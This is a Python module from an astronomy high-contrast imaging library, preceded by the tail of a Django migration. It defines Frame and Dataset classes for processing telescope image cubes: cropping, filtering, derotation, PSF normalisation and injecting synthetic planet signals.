field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='unittype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
]
| UPDDI/mps-database-server | assays/migrations/0048.py | Python | mit | 35,620 |
#! /usr/bin/env python
"""
Module with HCIDataset and HCIFrame classes.
"""
__author__ = 'Carlos Alberto Gomez Gonzalez'
__all__ = ['Dataset',
'Frame']
import numpy as np
import copy
import hciplot as hp
from .fits import open_fits
from .fm import (cube_inject_companions, generate_cube_copies_with_injections,
normalize_psf)
from .preproc import (frame_crop, frame_px_resampling, frame_rotate,
frame_shift, frame_center_satspots, frame_center_radon)
from .preproc import (cube_collapse, cube_crop_frames, cube_derotate,
cube_drop_frames, cube_detect_badfr_correlation,
cube_detect_badfr_pxstats, cube_detect_badfr_ellipticity,
cube_px_resampling, cube_subsample, cube_recenter_2dfit,
cube_recenter_satspots, cube_recenter_radon,
cube_recenter_dft_upsampling, cube_recenter_via_speckles)
from .var import (frame_filter_lowpass, frame_filter_highpass, frame_center,
cube_filter_highpass, cube_filter_lowpass, mask_circle)
from .stats import (frame_basic_stats, frame_histo_stats,
frame_average_radprofile, cube_basic_stats, cube_distance)
from .metrics import (frame_report, snr, snrmap, detection)
from .config.utils_conf import check_array, Saveable, print_precision
from .config.mem import check_enough_memory
class Frame(object):
""" High-contrast imaging frame (2d array).
Parameters
----------
data : numpy ndarray
2d array.
hdu : int, optional
        If ``data`` is a string, ``hdu`` indicates the HDU from the FITS file.
By default the first HDU is used.
fwhm : float, optional
The FWHM associated with this dataset (instrument dependent). Required
for several methods (operations on the cube).
"""
def __init__(self, data, hdu=0, fwhm=None):
""" HCIFrame object initialization. """
if isinstance(data, str):
self.data = open_fits(data, hdu, verbose=False)
else:
self.data = data
check_array(self.data, dim=2, msg='Image.data')
print('Frame shape: {}'.format(self.data.shape))
self.fwhm = fwhm
if self.fwhm is not None:
print('FWHM: {}'.format(self.fwhm))
def crop(self, size, xy=None, force=False):
""" Cropping the frame.
Parameters
----------
size : int, odd
Size of the subframe.
        xy : tuple, optional
            Coordinates of the center of the subframe.
        force : bool, optional
            ``size`` and the size of the 2d array must both be even or odd. With
            ``force`` set to True this condition can be avoided.
"""
self.data = frame_crop(self.data, size, xy, force, verbose=True)
def detect_blobs(self, psf, bkg_sigma=1, method='lpeaks',
matched_filter=False, mask=True, snr_thresh=5, plot=True,
debug=False, verbose=False, save_plot=None,
plot_title=None, angscale=False):
""" Detecting blobs on the 2d array.
"""
self.detection_results = detection(self.data, psf, bkg_sigma, method,
matched_filter, mask, snr_thresh,
plot, debug, True, verbose,
save_plot, plot_title, angscale)
def filter(self, method, mode, median_size=5, kernel_size=5, fwhm_size=5,
btw_cutoff=0.2, btw_order=2, gauss_mode='conv'):
""" High/low pass filtering the frames of the image.
Parameters
----------
        method : {'lp', 'hp'}
            Low-pass ('lp') or high-pass ('hp') filtering.
        mode : str
            For 'lp': {'median', 'gauss'}. For 'hp': {'laplacian',
            'laplacian-conv', 'median-subt', 'gauss-subt', 'fourier-butter'}.
"""
if method == 'hp':
self.data = frame_filter_highpass(self.data, mode, median_size,
kernel_size, fwhm_size,
btw_cutoff, btw_order)
elif method == 'lp':
self.data = frame_filter_lowpass(self.data, mode, median_size,
fwhm_size, gauss_mode)
else:
raise ValueError('Filtering mode not recognized')
print('Image successfully filtered')
def get_center(self, verbose=True):
""" Getting the coordinates of the center of the image.
Parameters
----------
verbose : bool optional
If True the center coordinates are printed out.
"""
return frame_center(self.data, verbose)
def plot(self, **kwargs):
""" Plotting the 2d array.
Parameters
----------
**kwargs : dict, optional
Parameters passed to the function ``plot_frames`` of the package
``HCIplot``.
"""
hp.plot_frames(self.data, **kwargs)
def radial_profile(self, sep=1):
""" Calculates the average radial profile of an image.
Parameters
----------
sep : int, optional
The average radial profile is recorded every ``sep`` pixels.
"""
radpro = frame_average_radprofile(self.data, sep=sep, plot=True)
return radpro
def recenter(self, method='satspots', xy=None, subi_size=19, sigfactor=6,
imlib='vip-fft', interpolation='lanczos4', debug=False,
verbose=True):
""" Recentering the frame using the satellite spots or a radon
transform.
Parameters
----------
method : {'satspots', 'radon'}, str optional
Method for recentering the frame.
xy : tuple, optional
Tuple with coordinates X,Y of the satellite spots. When the spots
are in an X configuration, the order is the following: top-left,
top-right, bottom-left and bottom-right. When the spots are in an
+ (cross-like) configuration, the order is the following: top,
right, left, bottom.
"""
if method == 'satspots':
if xy is None:
raise ValueError('`xy` must be a tuple of 4 tuples')
self.data, _, _ = frame_center_satspots(self.data, xy, subi_size,
sigfactor, True, imlib,
interpolation, debug,
verbose)
elif method == 'radon':
pass
# self.data = frame_center_radon()
else:
raise ValueError('Recentering method not recognized')
def rescale(self, scale, imlib='vip-fft', interpolation='bicubic',
verbose=True):
""" Resampling the image (upscaling or downscaling).
Parameters
----------
scale : int, float or tuple
Scale factor for upsampling or downsampling the frames in the cube.
If a tuple it corresponds to the scale along x and y.
imlib : {'ndimage', 'opencv', 'vip-fft'}, str optional
            Library used for image transformations; 'vip-fft' is the default.
interpolation : str, optional
            For 'ndimage' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and the 'biquintic' the slowest. The 'nearneig' is
            the worst option for interpolation of noisy astronomical images.
            For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
            The 'nearneig' interpolation is the fastest and the 'lanczos4' the
            slowest but the most accurate.
verbose : bool, optional
Whether to print out additional info such as the new image shape.
"""
self.data = frame_px_resampling(self.data, scale, imlib, interpolation,
verbose)
def rotate(self, angle, imlib='opencv', interpolation='lanczos4', cxy=None):
""" Rotating the image by a given ``angle``.
Parameters
----------
imlib : {'opencv', 'skimage', 'vip-fft'}, str optional
Library used for image transformations. Opencv is faster than
ndimage or skimage.
interpolation : str, optional
            For 'skimage' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and the 'biquintic' the slowest. The 'nearneig' is
            the poorest option for interpolation of noisy astronomical images.
            For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
            The 'nearneig' interpolation is the fastest and the 'lanczos4' the
            slowest but the most accurate. 'lanczos4' is the default.
cxy : tuple of int, optional
Coordinates X,Y of the point with respect to which the rotation
will be performed. By default the rotation is done with respect to
the center of the frames, as it is returned by the function
vip_hci.var.frame_center.
"""
self.data = frame_rotate(self.data, angle, imlib, interpolation, cxy)
print('Image successfully rotated')
def shift(self, shift_y, shift_x, imlib='vip-fft', interpolation='lanczos4'):
""" Shifting the image.
Parameters
----------
shift_y, shift_x: float
Shifts in x and y directions.
imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
Library or method used for performing the image shift.
'ndimage-fourier', does a fourier shift operation and preserves
better the pixel values (therefore the flux and photometry).
Interpolation based shift ('opencv' and 'ndimage-interp') is faster
than the fourier shift. 'opencv' is recommended when speed is
critical.
interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
Only used in case of imlib is set to 'opencv' or 'ndimage-interp',
where the images are shifted via interpolation.
            For 'ndimage-interp' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation is
            the fastest and the 'biquintic' the slowest. The 'nearneig' is the
            poorest option for interpolation of noisy astronomical images.
            For 'opencv' library: 'nearneig', 'bilinear', 'bicubic', 'lanczos4'.
            The 'nearneig' interpolation is the fastest and the 'lanczos4' the
            slowest but the most accurate. 'lanczos4' is the default.
"""
self.data = frame_shift(self.data, shift_y, shift_x, imlib,
interpolation)
print('Image successfully shifted')
def snr(self, source_xy, plot=False, verbose=True):
""" Calculating the S/N for a test resolution element ``source_xy``.
Parameters
----------
source_xy : tuple of floats
X and Y coordinates of the planet or test speckle.
plot : bool, optional
Plots the frame and the apertures considered for clarity.
verbose : bool, optional
Chooses whether to print some output or not.
Returns
-------
snr_val : float
Value of the S/N for ``source_xy``.
"""
if self.fwhm is None:
raise ValueError('FWHM has not been set')
return snr(self.data, source_xy, self.fwhm, False, plot, verbose)
def stats(self, region='circle', radius=5, xy=None, annulus_inner_radius=0,
annulus_width=5, source_xy=None, verbose=True, plot=True):
""" Calculating statistics on the image, both in the full-frame and in
        a region (circular aperture or annulus). Also, the S/N of either
``source_xy`` or the max pixel is calculated.
Parameters
----------
region : {'circle', 'annulus'}, str optional
Region in which basic statistics (mean, stddev, median and max) are
calculated.
radius : int, optional
Radius of the circular aperture.
xy : tuple of floats, optional
Center of the circular aperture.
annulus_inner_radius : int, optional
Inner radius of the annular region.
annulus_width : int, optional
Width of the annular region.
source_xy : tuple of floats, optional
Coordinates for which the S/N information will be obtained. If None,
the S/N is estimated for the pixel with the maximum value.
verbose : bool, optional
Whether to print out the values of the calculated statistics.
plot : bool, optional
Whether to plot the frame, histograms and region.
"""
res_region = frame_basic_stats(self.data, region, radius, xy,
annulus_inner_radius, annulus_width,
plot, True)
if verbose:
if region == 'circle':
msg = 'Stats in circular aperture of radius: {}pxs'
print(msg.format(radius))
elif region == 'annulus':
msg = 'Stats in annulus. Inner_rad: {}pxs, width: {}pxs'
print(msg.format(annulus_inner_radius, annulus_width))
mean, std_dev, median, maxi = res_region
msg = 'Mean: {:.3f}, Stddev: {:.3f}, Median: {:.3f}, Max: {:.3f}'
print(msg.format(mean, std_dev, median, maxi))
res_ff = frame_histo_stats(self.data, plot)
if verbose:
mean, median, std, maxim, minim = res_ff
print('Stats in the whole frame:')
msg = 'Mean: {:.3f}, Stddev: {:.3f}, Median: {:.3f}, Max: {:.3f}, '
msg += 'Min: {:.3f}'
print(msg.format(mean, std, median, maxim, minim))
print('\nS/N info:')
_ = frame_report(self.data, self.fwhm, source_xy, verbose)
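# --- Editor's illustrative sketch (not part of the original module): typical
# interactive use of the Frame wrapper, assuming an existing FITS image
# 'image.fits', an instrument FWHM of ~4.5 px and a test source near (63, 62);
# all three values are placeholder assumptions --
#
#     frame = Frame('image.fits', fwhm=4.5)
#     frame.filter(method='lp', mode='gauss', fwhm_size=5)
#     print(frame.snr(source_xy=(63, 62)))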
class Dataset(Saveable):
""" High-contrast imaging dataset class.
Parameters
----------
cube : str or numpy array
3d or 4d high-contrast image sequence. If a string is provided, cube is
interpreted as the path of the FITS file containing the sequence.
hdu : int, optional
        If ``cube`` is a string, ``hdu`` indicates the HDU from the FITS file.
        By default the first HDU is used.
angles : list or numpy array, optional
The vector of parallactic angles.
wavelengths : list or numpy array, optional
The vector of wavelengths (to be used as scaling factors).
fwhm : float, optional
The FWHM associated with this dataset (instrument dependent). Required
for several methods (operations on the cube).
px_scale : float, optional
The pixel scale associated with this dataset (instrument dependent).
psf : numpy array, optional
The PSF template associated with this dataset.
psfn : numpy array, optional
Normalized/cropped/centered version of the PSF template associated with
this dataset.
    cuberef : str, numpy array or Dataset, optional
        3d high-contrast image sequence to be used as a reference cube. Can
        also be a ``Dataset`` object, in which case its cube is used.
"""
_saved_attributes = ["cube", "psf", "psfn", "angles", "fwhm", "wavelengths",
"px_scale", "cuberef", "injections_yx"]
def __init__(self, cube, hdu=0, angles=None, wavelengths=None, fwhm=None,
px_scale=None, psf=None, psfn=None, cuberef=None):
""" Initialization of the HCIDataset object.
"""
# Loading the 3d/4d cube or image sequence
if isinstance(cube, str):
self.cube = open_fits(cube, hdu, verbose=False)
elif isinstance(cube, np.ndarray):
if not (cube.ndim == 3 or cube.ndim == 4):
raise ValueError('`Cube` array has wrong dimensions')
self.cube = cube
else:
raise TypeError('`Cube` has a wrong type')
print('Cube array shape: {}'.format(self.cube.shape))
if self.cube.ndim == 3:
self.n, self.y, self.x = self.cube.shape
self.w = 1
elif self.cube.ndim == 4:
self.w, self.n, self.y, self.x = self.cube.shape
# Loading the reference cube
if isinstance(cuberef, str):
self.cuberef = open_fits(cuberef, hdu, verbose=False)
elif isinstance(cuberef, np.ndarray):
msg = '`Cuberef` array has wrong dimensions'
if not cuberef.ndim == 3:
raise ValueError(msg)
if not cuberef.shape[1] == self.y:
raise ValueError(msg)
self.cuberef = cuberef
elif isinstance(cuberef, Dataset):
msg = '`Cuberef` array has wrong dimensions'
if not cuberef.cube.ndim == 3:
raise ValueError(msg)
if not cuberef.cube.shape[1] == self.y:
raise ValueError(msg)
self.cuberef = cuberef.cube
else:
self.cuberef = None
if self.cuberef is not None:
print('Cuberef array shape: {}'.format(self.cuberef.shape))
# Loading the angles (ADI)
if isinstance(angles, str):
self.angles = open_fits(angles, verbose=False)
else:
self.angles = angles
if self.angles is not None:
print('Angles array shape: {}'.format(self.angles.shape))
# Checking the shape of the angles vector
check_array(self.angles, dim=1, msg='Parallactic angles vector')
if not self.angles.shape[0] == self.n:
raise ValueError('Parallactic angles vector has a wrong shape')
# Loading the scaling factors (mSDI)
if isinstance(wavelengths, str):
self.wavelengths = open_fits(wavelengths, verbose=False)
else:
self.wavelengths = wavelengths
if self.wavelengths is not None:
print('Wavelengths array shape: {}'.format(self.wavelengths.shape))
# Checking the shape of the scaling vector
check_array(self.wavelengths, dim=1, msg='Wavelengths vector')
if not self.wavelengths.shape[0] == self.w:
raise ValueError('Wavelengths vector has a wrong shape')
# Loading the PSF
if isinstance(psf, str):
self.psf = open_fits(psf, verbose=False)
else:
self.psf = psf
if self.psf is not None:
print('PSF array shape: {}'.format(self.psf.shape))
# Checking the shape of the PSF array
if not self.psf.ndim == self.cube.ndim - 1:
msg = 'PSF array has a wrong shape. Must have {} dimensions, '
msg += 'got {} instead'
raise ValueError(msg.format(self.cube.ndim - 1, self.psf.ndim))
# Loading the normalized PSF
if isinstance(psfn, str):
self.psfn = open_fits(psfn, verbose=False)
else:
self.psfn = psfn
if self.psfn is not None:
print('Normalized PSF array shape: {}'.format(self.psfn.shape))
# Checking the shape of the PSF array
if not self.psfn.ndim == self.cube.ndim - 1:
msg = 'Normalized PSF array has a wrong shape. Must have {} '
msg += 'dimensions, got {} instead'
raise ValueError(msg.format(self.cube.ndim - 1, self.psfn.ndim))
self.fwhm = fwhm
if self.fwhm is not None:
if self.cube.ndim == 4:
                check_array(self.fwhm, dim=1, msg='FWHM')
elif self.cube.ndim == 3:
print('FWHM: {}'.format(self.fwhm))
self.px_scale = px_scale
if self.px_scale is not None:
print('Pixel/plate scale: {}'.format(self.px_scale))
self.injections_yx = None
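    # A minimal construction sketch. The file names, FWHM and pixel scale
    # below are placeholders, not values shipped with this package:
    #
    #   ds = Dataset('cube.fits', angles='angles.fits', psf='psf.fits',
    #                fwhm=4.2, px_scale=0.0272)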
def collapse(self, mode='median', n=50):
""" Collapsing the sequence into a 2d array.
"""
frame = cube_collapse(self.cube, mode, n)
print('Cube successfully collapsed')
return Frame(frame)
def crop_frames(self, size, xy=None, force=False):
""" Cropping the frames of the sequence (3d or 4d cube).
Parameters
----------
size : int
New size of the (square) frames.
        xy : tuple of ints, optional
            X, Y coordinates of the new frame center. If you are taking the
            coordinates from ds9, subtract 1 (Python uses 0-based indexing).
        force : bool, optional
            ``size`` and the original size of the frames must both be even or
            both be odd. With ``force`` set to True this condition can be
            bypassed.
"""
self.cube = cube_crop_frames(self.cube, size, xy, force, verbose=True)
def derotate(self, imlib='vip-fft', interpolation='lanczos4', cxy=None,
nproc=1, border_mode='constant', mask_val=np.nan,
edge_blend=None, interp_zeros=False, ker=1):
""" Derotating the frames of the sequence according to the parallactic
angles.
Parameters
----------
imlib : {'opencv', 'skimage', 'vip-fft'}, str optional
Library used for image transformations. Opencv is faster than
ndimage or skimage.
        interpolation : str, optional
            For the 'skimage' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and 'biquintic' the slowest. 'nearneig' is the
            worst option for interpolating noisy astronomical images.
            For the 'opencv' library: 'nearneig', 'bilinear', 'bicubic',
            'lanczos4'. The 'nearneig' interpolation is the fastest and
            'lanczos4' the slowest but the most accurate. 'lanczos4' is the
            default.
cxy : tuple of int, optional
Coordinates X,Y of the point with respect to which the rotation
will be performed. By default the rotation is done with respect to
the center of the frames, as it is returned by the function
vip_hci.var.frame_center.
nproc : int, optional
Whether to rotate the frames in the sequence in a multi-processing
fashion. Only useful if the cube is significantly large (frame size
and number of frames).
border_mode : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
mask_val : float, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
edge_blend : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
interp_zeros : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
ker: int, optional
See the documentation of the ``vip_hci.preproc.frame_rotate``
function.
"""
if self.angles is None:
raise ValueError('Parallactic angles vector has not been set')
self.cube = cube_derotate(self.cube, self.angles, imlib,
interpolation, cxy, nproc, border_mode,
mask_val, edge_blend, interp_zeros, ker)
print('Cube successfully derotated')
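    # Typical ADI step, sketched with the defaults (assumes ``ds.angles`` has
    # been set): derotate the cube to a common orientation, then collapse it.
    #
    #   ds.derotate(imlib='vip-fft', interpolation='lanczos4')
    #   frame = ds.collapse(mode='median')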
def drop_frames(self, n, m, verbose=True):
"""
        Slice the cube so that all frames between ``n`` and ``m`` are kept.
The indices ``n`` and ``m`` are included and 1-based.
Examples
--------
        For a cube with 5 frames numbered ``1, 2, 3, 4, 5``, calling
        ``ds.drop_frames(2, 4)`` results in frames ``2, 3, 4`` being kept, so
        the first and the last frame are discarded.
"""
res = cube_drop_frames(self.cube, n, m, self.angles, verbose=verbose)
        if self.angles is not None:
self.cube, self.angles = res
else:
self.cube = res
def filter(self, method, mode, median_size=5, kernel_size=5, fwhm_size=5,
btw_cutoff=0.2, btw_order=2, gauss_mode='conv', verbose=True):
""" High/low pass filtering the frames of the cube.
Parameters
----------
        method : {'lp', 'hp'}
            Low-pass ('lp') or high-pass ('hp') filtering.
        mode : str
            For ``method='lp'``: {'median', 'gauss'}.
            For ``method='hp'``: {'laplacian', 'laplacian-conv', 'median-subt',
            'gauss-subt', 'fourier-butter'}.
"""
if method == 'hp':
self.cube = cube_filter_highpass(self.cube, mode, median_size,
kernel_size, fwhm_size,
btw_cutoff, btw_order, verbose)
elif method == 'lp':
self.cube = cube_filter_lowpass(self.cube, mode, median_size,
fwhm_size, gauss_mode, verbose)
else:
            raise ValueError('Filtering method not recognized')
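    # Filtering sketch; the kernel size below is illustrative only:
    #
    #   ds.filter('lp', 'median', median_size=7)   # low-pass (smoothing)
    #   ds.filter('hp', 'laplacian')                # high-pass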
def frame_distances(self, frame, region='full', dist='sad',
inner_radius=None, width=None, plot=True):
""" Calculating the frame distance/correlation with respect to a
reference image.
Parameters
----------
frame : int or 2d array
Reference frame in the cube or 2d array.
region : {'full', 'annulus'}, string optional
Whether to use the full frames or a centered annulus.
dist : {'sad','euclidean','mse','pearson','spearman', 'ssim'}, str optional
Which criterion to use.
        inner_radius : None or int, optional
            The inner radius when ``region`` is 'annulus'.
        width : None or int, optional
            The width when ``region`` is 'annulus'.
plot : bool, optional
Whether to plot the distances or not.
"""
_ = cube_distance(self.cube, frame, region, dist, inner_radius, width,
plot)
def frame_stats(self, region='circle', radius=5, xy=None,
annulus_inner_radius=0, annulus_width=5, wavelength=0,
plot=True):
""" Calculating statistics on a ``region`` (circular aperture or
annulus) of each image of the sequence.
Parameters
----------
region : {'circle', 'annulus'}, str optional
Region in which basic statistics (mean, stddev, median and max) are
calculated.
radius : int, optional
Radius of the circular aperture.
xy : tuple of floats, optional
Center of the circular aperture.
annulus_inner_radius : int, optional
Inner radius of the annular region.
annulus_width : int, optional
Width of the annular region.
wavelength : int, optional
Index of the wavelength to be analyzed in the case of a 4d cube.
plot : bool, optional
Whether to plot the frame, histograms and region.
"""
if self.cube.ndim == 3:
_ = cube_basic_stats(self.cube, region, radius, xy,
annulus_inner_radius, annulus_width, plot,
False)
elif self.cube.ndim == 4:
print('Stats for wavelength {}'.format(wavelength + 1))
_ = cube_basic_stats(self.cube[wavelength], region, radius, xy,
annulus_inner_radius, annulus_width, plot,
False)
def inject_companions(self, flux, rad_dists, n_branches=1, theta=0,
imlib='vip-fft', interpolation='lanczos4',
full_output=False, verbose=True):
""" Injection of fake companions in 3d or 4d cubes.
Parameters
----------
flux : float or list
Factor for controlling the brightness of the fake companions.
rad_dists : float, list or array 1d
Vector of radial distances of fake companions in pixels.
n_branches : int, optional
            Number of azimuthal branches.
theta : float, optional
Angle in degrees for rotating the position of the first branch that
by default is located at zero degrees. Theta counts
counterclockwise from the positive x axis.
        imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
            Library or method used for performing the image shift.
            'ndimage-fourier' performs a Fourier shift operation and better
            preserves the pixel values (and therefore the flux and photometry).
            Interpolation-based shifts ('opencv' and 'ndimage-interp') are
            faster than the Fourier shift. 'opencv' is recommended when speed
            is critical.
        interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
            Only used if ``imlib`` is set to 'opencv' or 'ndimage-interp', in
            which case the images are shifted via interpolation. For the
            'ndimage-interp' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and 'biquintic' the slowest. 'nearneig' is the
            worst option for interpolating noisy astronomical images.
            For the 'opencv' library: 'nearneig', 'bilinear', 'bicubic',
            'lanczos4'. The 'nearneig' interpolation is the fastest and
            'lanczos4' the slowest but the most accurate. 'lanczos4' is the
            default.
full_output : bool, optional
Return the coordinates of the injected companions.
verbose : bool, optional
If True prints out additional information.
Returns
-------
yx : list of tuple(y,x)
[full_output=True] Pixel coordinates of the injections in the first
frame (and first wavelength for 4D cubes). These are only the new
injections - all injections (from multiple calls to this function)
are stored in ``self.injections_yx``.
"""
if self.angles is None:
raise ValueError('The PA angles have not been set')
if self.psfn is None:
raise ValueError('The normalized PSF array cannot be found')
if self.px_scale is None:
raise ValueError('Pixel/plate scale has not been set')
if self.cube.ndim == 4:
if self.wavelengths is None:
raise ValueError('The wavelengths vector has not been set')
self.cube, yx = cube_inject_companions(
self.cube, self.psfn, self.angles, flux, self.px_scale,
rad_dists, n_branches, theta, imlib, interpolation,
full_output=True, verbose=verbose
)
if self.injections_yx is None:
self.injections_yx = []
self.injections_yx += yx
if verbose:
print("Coordinates of the injections stored in self.injections_yx")
if full_output:
return yx
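    # Injection sketch. The flux and separations are placeholder values, and
    # ``ds.psfn``, ``ds.angles`` and ``ds.px_scale`` must already be set:
    #
    #   yx = ds.inject_companions(flux=50, rad_dists=[15, 30], n_branches=2,
    #                             theta=45, full_output=True)
    #   print(ds.injections_yx)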
def generate_copies_with_injections(self, n_copies, inrad=8, outrad=12,
dist_flux=("uniform", 2, 500)):
"""
Create copies of this dataset, containing different random injections.
Parameters
----------
        n_copies : int
            Number of dataset copies to generate (and yield).
        inrad, outrad : float
            Inner and outer radius of the injections. The actual injection
            position is chosen randomly between these radii.
        dist_flux : tuple('method', *params)
            Tuple describing the flux selection. If ``method`` is a function,
            the ``*params`` are passed to it. ``method`` can also be a string
            naming a pre-defined random function:
``("skewnormal", skew, mean, var)``
uses scipy.stats.skewnorm.rvs
``("uniform", low, high)``
uses np.random.uniform
``("normal", loc, scale)``
uses np.random.normal
Yields
-------
fake_dataset : HCIDataset
Copy of the original HCIDataset, with injected companions.
"""
for data in generate_cube_copies_with_injections(
self.cube, self.psf, self.angles, self.px_scale, n_copies=n_copies,
inrad=inrad, outrad=outrad, dist_flux=dist_flux
):
dsi = self.copy()
dsi.cube = data["cube"]
dsi.injections_yx = data["positions"]
# data["dist"], data["theta"], data["flux"] are not used.
yield dsi
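    # Sketch of generating fake datasets, e.g. for testing a detection
    # algorithm. The flux range is a placeholder and ``run_detection`` is a
    # hypothetical user function, not part of this module:
    #
    #   for fake_ds in ds.generate_copies_with_injections(
    #           n_copies=10, inrad=8, outrad=12,
    #           dist_flux=("uniform", 2, 500)):
    #       run_detection(fake_ds.cube)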
def get_nbytes(self):
"""
Return the total number of bytes the HCIDataset consumes.
"""
return sum(arr.nbytes for arr in [self.cube, self.cuberef, self.angles,
self.wavelengths, self.psf, self.psfn]
if arr is not None)
def copy(self, deep=True, check_mem=True):
"""
Create an in-memory copy of this HCIDataset.
        This is especially useful for keeping a backup copy of the original
        dataset before modifying it (e.g. with injections).
Parameters
----------
deep : bool, optional
By default, a deep copy is created. That means every (sub)attribute
is copied in memory. While this requires more memory, one can safely
modify the attributes without touching the original HCIDataset. When
``deep=False``, a shallow copy of the HCIDataset is returned
instead. That means all attributes (e.g. ``self.cube``) point back
to the original object's attributes. Pay attention when modifying
such a shallow copy!
check_mem : bool, optional
[deep=True] If True, verifies that the system has enough memory to
store the result.
Returns
-------
new_dataset : Dataset
(deep) copy of this HCIDataset.
"""
if deep:
if check_mem and not check_enough_memory(self.get_nbytes(), 1.5,
verbose=False):
raise RuntimeError("copy would require more memory than "
"available.")
return copy.deepcopy(self)
else:
return copy.copy(self)
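    # Copy sketch: keep a pristine backup before destructive operations.
    #
    #   backup = ds.copy()           # deep copy (checks available memory)
    #   view = ds.copy(deep=False)   # shallow copy; arrays are shared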
def load_angles(self, angles, hdu=0):
""" Loads the PA vector from a FITS file. It is possible to specify the
HDU.
Parameters
----------
angles : str or 1d numpy ndarray
List or vector with the parallactic angles.
hdu : int, optional
            If ``angles`` is a string, ``hdu`` indicates the HDU from the FITS
            file. By default the first HDU is used.
"""
if isinstance(angles, str):
self.angles = open_fits(angles, hdu)
elif isinstance(angles, (list, np.ndarray)):
self.angles = angles
else:
msg = '`Angles` has a wrong type. Must be a list or 1d np.ndarray'
raise ValueError(msg)
def load_wavelengths(self, wavelengths, hdu=0):
""" Loads the scaling factors vector from a FITS file. It is possible to
specify the HDU.
Parameters
----------
wavelengths : str or 1d numpy ndarray
List or vector with the wavelengths.
hdu : int, optional
            If ``wavelengths`` is a string, ``hdu`` indicates the HDU from the
            FITS file. By default the first HDU is used.
"""
if isinstance(wavelengths, str):
self.wavelengths = open_fits(wavelengths, hdu)
elif isinstance(wavelengths, (list, np.ndarray)):
self.wavelengths = wavelengths
else:
msg = '`wavelengths` has a wrong type. Must be a list or np.ndarray'
raise ValueError(msg)
def mask_center(self, radius, fillwith=0, mode='in'):
""" Masking the values inside/outside a centered circular aperture.
Parameters
----------
radius : int
Radius of the circular aperture.
fillwith : int, float or np.nan, optional
Value to put instead of the masked out pixels.
mode : {'in', 'out'}, optional
When set to 'in' then the pixels inside the radius are set to
``fillwith``. When set to 'out' the pixels outside the circular
mask are set to ``fillwith``.
"""
self.cube = mask_circle(self.cube, radius, fillwith, mode)
def normalize_psf(self, fit_fwhm=True, size=None, threshold=None,
mask_core=None, model='gauss', imlib='vip-fft',
interpolation='lanczos4', force_odd=True, verbose=True):
""" Normalizes a PSF (2d or 3d array), to have the flux in a 1xFWHM
aperture equal to one. It also allows to crop the array and center the
PSF at the center of the frame(s).
Parameters
----------
fit_fwhm: bool, optional
Whether to fit a ``model`` to estimate the FWHM instead of using the
self.fwhm attribute.
        size : int or None, optional
            If int, it corresponds to the size of the square subimage to be
            cropped from the PSF array.
        threshold : None or float, optional
            Sets to zero small values, trying to leave only the core of the
            PSF.
        mask_core : None or float, optional
            Radius of a circular aperture for the core of the PSF; everything
            outside it is set to zero.
        imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
            Library or method used for performing the image shift.
            'ndimage-fourier' performs a Fourier shift operation and better
            preserves the pixel values (and therefore the flux and photometry).
            Interpolation-based shifts ('opencv' and 'ndimage-interp') are
            faster than the Fourier shift. 'opencv' is recommended when speed
            is critical.
        interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
            Only used if ``imlib`` is set to 'opencv' or 'ndimage-interp', in
            which case the images are shifted via interpolation. For the
            'ndimage-interp' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and 'biquintic' the slowest. 'nearneig' is the
            worst option for interpolating noisy astronomical images.
            For the 'opencv' library: 'nearneig', 'bilinear', 'bicubic',
            'lanczos4'. The 'nearneig' interpolation is the fastest and
            'lanczos4' the slowest but the most accurate. 'lanczos4' is the
            default.
        force_odd : bool, optional
            If True the resulting array will have odd size (and the PSF will
            be placed at its center). If False, and the frame size is even,
            the PSF will be placed at the center of an even-sized frame.
verbose : bool, optional
If True intermediate results are printed out.
"""
if not fit_fwhm and self.fwhm is None:
raise ValueError('FWHM has not been set')
if self.psf is None:
raise ValueError('PSF array has not been loaded')
if not fit_fwhm:
fwhm = self.fwhm
else:
fwhm = 'fit'
res = normalize_psf(self.psf, fwhm, size, threshold, mask_core, model,
imlib, interpolation, force_odd, True, verbose)
self.psfn, self.aperture_flux, self.fwhm = res
print('Normalized PSF array shape: {}'.format(self.psfn.shape))
print('The attribute `psfn` contains the normalized PSF')
print("`fwhm` attribute set to")
print_precision(self.fwhm)
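    # PSF normalization sketch; ``size`` is a placeholder crop size:
    #
    #   ds.normalize_psf(fit_fwhm=True, size=19, model='gauss')
    #   print(ds.psfn.shape, ds.fwhm)   # normalized PSF and fitted FWHM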
def plot(self, **kwargs):
""" Plotting the frames of a 3D or 4d cube.
Parameters
----------
**kwargs : dict, optional
Parameters passed to the function ``plot_cubes`` of the package
``HCIplot``.
"""
